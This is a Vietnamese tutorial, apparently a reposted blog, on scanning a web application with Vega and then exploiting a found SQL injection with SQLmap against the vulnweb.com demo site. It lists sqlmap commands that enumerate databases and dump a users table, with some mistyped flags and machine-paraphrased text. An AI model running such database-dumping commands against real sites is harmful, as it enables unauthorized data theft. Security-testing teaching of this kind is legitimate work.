Chúng tôi rất vui mừng được chia sẻ kiến thức sâu sắc về từ khóa Sqlmap la gi để tối ưu hóa nội dung trang web và tiếp thị trực tuyến. Bài viết cung cấp phương pháp tìm kiếm, phân tích từ khóa và chiến lược hiệu quả. Cảm ơn sự quan tâm và hãy tiếp tục theo dõi để cập nhật kiến thức mới.
Scan web là gì
Scan web hay Web application scanning còn được gọi là quét ứng dụng web, mục tiêu của việc scan web là quét những lỗ hổng ứng dụng web, thu thập tài liệu website để tìm những lỗ hổng trong các ứng dụng web.
Bạn Đang Xem: Vega, SQLmap từ scan đến khai thác SQL injection
Scanning software sau thời điểm phân tích tất các page có thể truy cập sẽ xây dựng dựng cấu trúc của toàn bộ website.
Scan web cũng sẽ có thể xem là một phần quan trọng trong bảo mật thông tin ứng dụng web, nó giúp các nhà phát triển ứng dụng web tìm ra những điểm yếu trong những dự án mà người ta xây dựng.
Vega
Vega là một platform để kiểm tra tính bảo mật thông tin của một ứng dụng web applications. Vega được viết bằng Java, và chạy trên nhiều nền tảng khác nhau như Linux, OS X, Windows, được phát triển bởi Subgraph.
Vega có thể hoạt động như một proxy, hoặc như một ứng dụng quét tự động hóa. Các modules có thể tự động hóa gửi các requests để kiểm tra các lỗ hổng như XSS, SQL injection…
SQLmap
SQLmap là một dụng cụ mã nguồn mở, tự động hóa kiểm tra và phát hiện lỗ hổng SQL injection, có thể chạy được trên nhiều nền tảng như Linux, Mac OS, Windows.
Cấu hình và scan
Trong nội dung bài viết này mình sử dụng tool Vega để thu thập lỗ hổng, tài liệu của một website.
Trước lúc thực hiện scan một website nào đó bạn phải nắm rõ mục tiêu và mong muốn thu thập những gì từ website đó để tối giản nhất trong việc scan.
1. Cấu hình
-
Add target
Website mà mình demo
Xem Thêm : Trọng âm Tiếng Anh là gì? – Quy tắc nhấn trọng âm
- Chọn modules cấp thiết
- Hoàn thành cấu hình và khai mạc quét
2. Thu thập kết quả
Sau thời điểm quét xong tất cả chúng ta thấy các lỗ hổng ở từng mức độ khác nhau được thông kê cụ thể
Ở đây mình quét được một số lỗi như XSS, SQL injection, RFI
3. Khai thác
Trong bài này mình có dùng SQLmap để khai thác lỗi SQL injection mà tôi đã quét được để xem độ hiểu quả của tool tôi vừa dùng ở trên.
Hoàn toàn có thể xem được requests cũng nhưng response ở từng lỗ hổng một, đây là một requests và response của một lỗi SQL injection mà mình tìm được.
SQLmap là một dụng cụ mạnh và hữu ích cho việc khai thác lỗ hổng SQL injection
Dùng SQLmap để kiểm tra
sqlmap -u http://testphp.vulnweb.com/product.php?pic=7%20AND%201=2%20-%20 -keep-alive -random-agent
- -u url cần quét
- -keep-alive sử dụng HTTP(s) connections
- -random-agent sử dụng HTTP User-Agent tình cờ
Xem Thêm : Tìm hiểu đặc điểm của kinh doanh Nhà hàng
sqlmap -u http://testphp.vulnweb.com/product.php?pic=7%20AND%201=2%20-%20 -dbs
- -dbs liệt kê các databases
Sau khi sử dụng SQLmap thì mình đã đoạt thông tin có 2 databases, thử xem database acuart có gì không nào.
sqlmap -u http://testphp.vulnweb.com/product.php?pic=7%20AND%201=2%20-%20 -D acuart -columns
- -D chọn database để thao tác
- -colmns liệt kê các columns
Cùng xem bảng users có những thông tin gì
sqlmap -u http://testphp.vulnweb.com/product.php?pic=7%20AND%201=2%20-%20 -D acuart -T users -dump
- -T chọn bảng thực thi
- -dump lấy các tài liệu
Đây là ví dụ về 3 bảng mình lấy được, và còn rất nhiều bảng khác nữa thông qua đó thấy tool Vega cũng là một dụng cụ khá hay để quét ứng dụng web đấy chứ.
Tóm lại
Vega còn một số tính năng nữa mà mình chưa khám phá hết, mình sẽ nỗ lực cố gắng tìm hiểu thêm để sở hữu thể san sớt cùng mọi người.
Hi vọng qua nội dung bài viết của mình các bạn cũng có thể hiểu thêm về scan web, cách sử dụng tool Vega để quét một website nào đó, cũng như dùng SQLmap để khai thác những lỗi SQL injection mà các bạn quét được. Cảm ơn các bạn đã theo dõi nội dung bài viết của mình!
